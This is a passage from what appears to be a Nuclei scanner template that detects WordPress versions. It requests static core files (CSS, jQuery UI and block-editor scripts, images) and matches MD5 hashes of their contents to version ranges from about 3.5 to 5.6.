== md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"b020388806a04a345a11b54a667b0f0a\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"6e1c9ca18902b56c36af3e28246eeac7\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.26 - dsl: - - "(\"5a9b0f003097c036cd9652b97ae58b5e\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"6d9237b9422cde63ae1b46d65e92c4ec\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"f6d59352fe85ef21f18a00b92507a1cf\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"30f1caf5ac1ca40c859539bbf81e439e\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"eee72a2f2014c3d8f615a9284f5c5aac\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"f73f4774e692b7fb4c9cadbe6d1cb18b\" == md5(body))" - - type: dsl - name: 4.0.27 - 4.0.32 - dsl: - - "(\"afa8cd3fc9d22defe9b2b195627e909a\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"f1511382ee737a33ca146addbd855607\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"f811888802876ed3ed6ca1b1f4f1dbab\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"b4efb3e7744d0a1e70748138da9e6804\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"04f9105a8b65245cf22080dca66382f8\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"6d1097917d04a4ac0aaa1bd08fa4943c\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"c17b036935ef47a816c90b5faa543c0e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/light/colors.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"3b42ed8f88b3504e85fa6c9bcffc7d68\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"b0a2e41cc8e4fc1d20b51923cc1412b6\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"85e47a254d85f992643bdc75f3f130bc\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"37b13af5b2d2fe92bda3ea34734fa727\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"e4022388c07ee804bd347f23e1662158\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"25e706f4ca9277b6f5c09ec85e8360ac\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"2297575ac6851b541ef9f8797d318ec2\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"347944869f261dbbbd1d39e466652be3\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"2bffe9b64cd0f84a079fc09708785026\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"3dc722ed8881be9e50c0889a8c6dcc70\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"2e105d8125f21fa58ebd346a11e9efcc\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"24ce38778beaf7899914f079cc6e1bd7\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"a27f248d1478b01d1fbdaff924a9c9d9\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"d91432b5b30c8a375f88a2476fb83953\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"75aa2db229bd2da0e80af17e8b1eee7a\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"e1d733902309caf84b473f3d0ac2d846\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"367b273fcbf2e1018eef5046fd93149d\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"f5df1e2a1d7db3ee134cd4259e7f0f8e\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"9976161dacac2691db0c1ab9d9f64928\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/light/colors-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"6f8cbadd7a62e47b10fd1fa31ade20bd\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"f60e0eb47f81bbc633a19b19e6cf6f7b\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"8753f151ad2a1db9d6a51f3825986c45\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"b4be2184e5b0187f52904e43be7cbb8e\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"47089b7b3f48af038d9731dcd450da3b\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"ca985fbb17060a4a54e0c2b9c9e4c54a\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"e3ceeb9466bd89ba5ee791130f9ca85f\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"9d2aa89b387842aab22c1403ada1ad30\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"74c24051404a9db46da1792f4f3eab02\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"d1d45cb5385dc3a0dda32b2339b660aa\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"f1ee0df10cdc3a4308768472cc3e8667\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"cfa4791d5201633ce396fea1d3c25218\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"cc5ba6eaf7d90ccab5fd1a705d0b57e7\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"34c7ecd41abb111fdd058dffd0de8751\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"7e659847f1761bde89f2090ff4675d49\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"7e9d6252fd84110298fc42e80f31c4b1\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"9396d21e0d8b5e06542871200176f303\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"2cf260411296203c7fce4e25140923db\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"cba6790eb8274eb25b2e3f15a77c519e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/light/colors-rtl.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"d12c6321c2905a72081e07d1f3696532\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"22a8f413fe68dd3e05d11127d089985e\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"1bdecd78f1ec3604f202995e0785e120\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"6e8c045bd416f95339a55569ea56af50\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"14e0f61252198b7f5bc6b3954f86495c\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"135321308e0cff17720381814fe670fe\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"9b5e58edb3659476950318940d69673e\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"168ab9cfc76d472aa3b19a18b66c1e05\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"0924761e149d1a02d724234b8eb7fdd5\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"862cede744447240baa0e2c7c6014eb3\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"205693de99633c27a39d0c1783b792e3\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"e24995d6dd77c3de2e2a76bdee5878f8\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"5f9aeafda976bdcac79c9eb792607eb4\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"59f2d58002bce3c1c231f856821cdda4\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"d0c2fc2631752d6d9fbb17bac33b0a0e\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"6ac1f0dff2731afc92b387bf90bcbfe4\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"f84934b18bba2ef7087435a63cc7d823\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"af0bff7c54e72b9cfb0980cce35939fe\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"f6a57bc44778998dd4f03246137c77ab\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/light/colors.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"4c299fa424111f5c08a1965011cec210\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"8793d3def979fb16292094f477cecc32\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"ef025447b62b0fb2dfda1cea9f94a0cf\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"7cb25e3697da8c991aafdff1746a2844\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"c64378da84783433e12a436eabb62f79\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"fcb5d20b06e3fd14e30ff9e923992c85\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"71d29edd099575774b911e59e06c12dd\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"e9458e7a35d7956a8d2cbfadb98b630c\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.30 - dsl: - - "(\"a33dcc15411e093809cc2a644ef86023\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"8dc3381d0f8e3894c39dd12664c9da35\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"12887d90070563f1d8df477f35e141b3\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"cb875ea5329fb6ae3e3db356473adc84\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"f1c96c88b39f8f49af243220e8d3b9e4\" == md5(body))" - - type: dsl - name: 3.8.31 - 3.8.33 - dsl: - - "(\"c3219e4d10fb9173b6943680fb1cef5c\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"0e0a26930fec17520735158ccffacf87\" == md5(body))" - - type: dsl - name: 5.3.2 - 5.4.4 - dsl: - - "(\"67759de92dd9a5b53387ecf2ff9823dc\" == md5(body))" - - type: dsl - name: 5.3.1 - dsl: - - "(\"9045e2d84b0efff56c02d3b7cbc5eed8\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"383d77279848f54af0aad27d03493c87\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"2e1fe03f5361c38fab42e0e53ad0d962\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/post.min.js" - matchers: - - type: dsl - name: 4.7 - 5.0.11 - dsl: - - "(\"ede5f7e8431dbeb790e8cf9665192171\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"2be11faf4eac3102801d149351155634\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"c992b68f5eeb27a0b9dea211084c67df\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"663170b582dd9b0d221e28bda521a7ee\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"2592d7b6de8cc11ebacf7b25cea135e0\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"c47dac85d54efe4352e7e5d6045970ab\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"269e1c1bcb01aeb3fad829be7ed4aacd\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"ab0efe0b053c1f256c1162bfacea56ce\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"62e4524aa815499b0051da2cadbf86d1\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"96e5a6b4448a8817566d3575925a9660\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"0b36f334be278c6b5bd7077f95315b69\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"9341ffcbbe31f030b5555739ddee103b\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"c6b980f0fd65f11fce68d0493c933f02\" == md5(body))" - - type: dsl - name: 3.5.1 - 3.5.2 - dsl: - - "(\"ce823a427058873c7251ce707aa717b2\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"1e251e3ba10b2a9d7f3f496cec3ba3df\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"23749291713af38bcd57fc67847b33ac\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"a4f6d69eae837efe91c823a67bd6b51c\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"e80d95db0d7ee2b88c1a19e2e936033d\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"2ccb4e6d8db314a751d0f26ccb1f3050\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"1cf1102d0221653ce70fa97e66f19fa8\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"dc192b32b16ed7c12cf9e1814f3166e2\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"73cf1fc4bd46ddb72b5ab033c25d7151\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"41983d3c2afbd6dae6a6190bfb30b5ce\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/embed/block.json" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"012e35dbf37c9ffc5ea96cd1bc219658\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/jquery.min.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"b6f7093369a0e8b83703914ce731b13c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/accordion.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"b9b89ad1d4f4f85a17bdeadde861d7c2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-puff.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"8daa4348cc13d877079c64dfdcccd69e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-pulsate.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"aa2a0dd249e4cd953b748e971457bff5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/droppable.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"2fbff289eeb05f0a61fdeb47ee0197dd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/tooltip.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"ec26c23c51f5317d809ce60b99a09e96\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/datepicker.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"f2345031072cd99d8803607892acb5b5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/selectmenu.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"6f8d1878852065716483e58908d12449\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/tabs.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"182baf37339f6cbda563c950beb0c552\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/resizable.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"766bbc6d4f2c95e6ada56e33ad82e0a6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-scale.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"2ccaa13092d3065c4b34072798c274e4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/controlgroup.min.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"dbbe37c4356a29b0002117a9a63ab2f0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/dialog.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"c1e5b1accf5594a2751590cede7acc9c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-slide.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"e5b20c93619b648c827b1532d7b010d8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/checkboxradio.min.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"ca832f201f7fa588f233d58ec95cc4fd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-shake.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"fa3b35c9fb5f8a80ffb4d7e9c6bd22dc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"05be6adb42732a43a883e5b5f5781ff7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-clip.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"5d1c30325b579030563117c87f031551\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-transfer.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"4f1714d4a94ef3188d69e3f71cfed531\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-explode.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"918530b61da416ed692131af8e0b09f2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-bounce.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"c23b42a220e5d607475951fb6ef2dfb4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/autocomplete.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"103a644cfe2aefc145bd031d262a2105\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/slider.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"f5e2ab7dd0c055ebefebc6a4fd87afa2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/progressbar.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"4e1da4893d69f44492e95f7a799d0d33\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-highlight.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"6e2b29c208a7ef1d1eabcd49814c0db6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-fade.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"fa0f7273a34aafcf374f2cec0ce6ff11\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-size.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"613b6c8940a0edb59a7225b9dda20b5a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/draggable.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"13a2fc3a32af84670639d0744cb34489\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/checkboxradio.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"fe2256536412460abfa46ba086833a10\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/mouse.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"d9c1b4ebe4c4b269ea16f0c00db3dbe0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/selectable.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"2139db7166e7d24837ed7b422c9b7ad5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-drop.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"abc1b9e996b48a75298642ac81d131f7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/button.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"a61409f4e92ea9d81ec8b4fc66687e4f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/core.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"03185043abecf50db27be7746ba02278\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/menu.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"a9fb5616376707a2c1aea771b7caa410\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/controlgroup.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"2fd96d0e55bfd44b1a4e5017862a7b8d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/sortable.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"9f6b58c7f1f145079b454cdafb268d1c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-fold.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"cbc47d3a68f942fdd5af7d7a13fb78e9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/spinner.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"16e7fc3896c9545869dbf84dc1105984\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-blind.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"ab1dbcf4e37b35b6e60bc51e25816b6f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/reusable-blocks.min.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"5f15dd8e68615a0aa5ab147eb647af58\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/reusable-blocks.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"f57dc6819aaf2bc92ac6cea8849a2f98\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/freedoms.png" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"657f0dd12498195df04f7bf0a2f0fd84\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/privacy.png" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"c6d29f81dd98f505c70487d3bdd87d84\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/auth-app.min.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"8ec531b03666d9538c6b03cafde4cb02\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/auth-app.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"62cead99458abe76011dc34f6b077697\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/application-passwords.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"45f6def0488306f747ae93270b8c1a52\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/application-passwords.min.js" - matchers: - - type: dsl - name: 5.6 - dsl: - - "(\"d8279901647f008258e250f8dcfb5652\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/element.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"0767833ec2d557e2fb8cc7cce93d07fd\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"fe88f0268727624b18aad39156e0fcfa\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"67ecb40edbf9ac38971734f2362023c3\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"f27ed347732c01ecb68ec39a45bd8b19\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.4 - dsl: - - "(\"4281e59a1bbd522ae68bb353b3742372\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"1af0ec7121e09261bbaa00c76b892829\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"6d8871831cefb35ae2bd86d1ae855156\" == md5(body))" - - type: dsl - name: 5.3.5 - 5.3.6 - dsl: - - "(\"ff4416a2c0c709dc65eaf5362822ac47\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"be3b6997217abdf27c33dabfaf66044a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/element.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"cfaf798326a1f494c6593161d90faa41\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"058ac8898dad07d85527a9e2983620d5\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"9d3ed277333cb350bac911821d395dad\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"672ab7c0d147a163c03f81a015d1f235\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.4 - dsl: - - "(\"5a9a26812516f2b3cbf83f89de6142f3\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"49f99b4b03e933aa76efb3fa94633b78\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"89d496444690eac0f660412785f33bf3\" == md5(body))" - - type: dsl - name: 5.3.5 - 5.3.6 - dsl: - - "(\"ecb0cc9b0933db6ca8a0da36ea1b56ed\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"8e2a734b9b8a7e0fc63e086866c94e4c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/i18n.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"3762e49b94ff5c920b2134988f7e32dd\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"0ea52e8da6cb91f2af5a5a0505a318a2\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"f9bba0a9887d37c9a77856c92106c9e0\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.4 - dsl: - - "(\"34c000e943a288c66c0abb5d159c0b4b\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"e2d4275df035d483e9e9f3cddffbb8c5\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"a52a9c5c5045d8837247725f4dcfc1a4\" == md5(body))" - - type: dsl - name: 5.3.5 - 5.3.6 - dsl: - - "(\"542a206a36356b8c5f1e68c77e1d5ac5\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"09351928abfc3c611ded68553f891b14\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/list-reusable-blocks.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"9e5728386c1eaa1c6eb5a23eeb9ff0c8\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"af983ce033e97390b9c273b403e4e68a\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"d86708dfed8ae007dc9232534bfab807\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.4 - dsl: - - "(\"aa582350f107018b73961b3a99fda195\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"c1852be5984fd31a87311bca5b46a2b8\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"f5e7ea66cbc7773c765961a62f248c94\" == md5(body))" - - type: dsl - name: 5.3.5 - 5.3.6 - dsl: - - "(\"944c994d8f0f236431e888e635b9acbd\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"c521793f232f4d30a4ca13f4d1ffa118\" == md5(body))" - - method: GET - path: - - 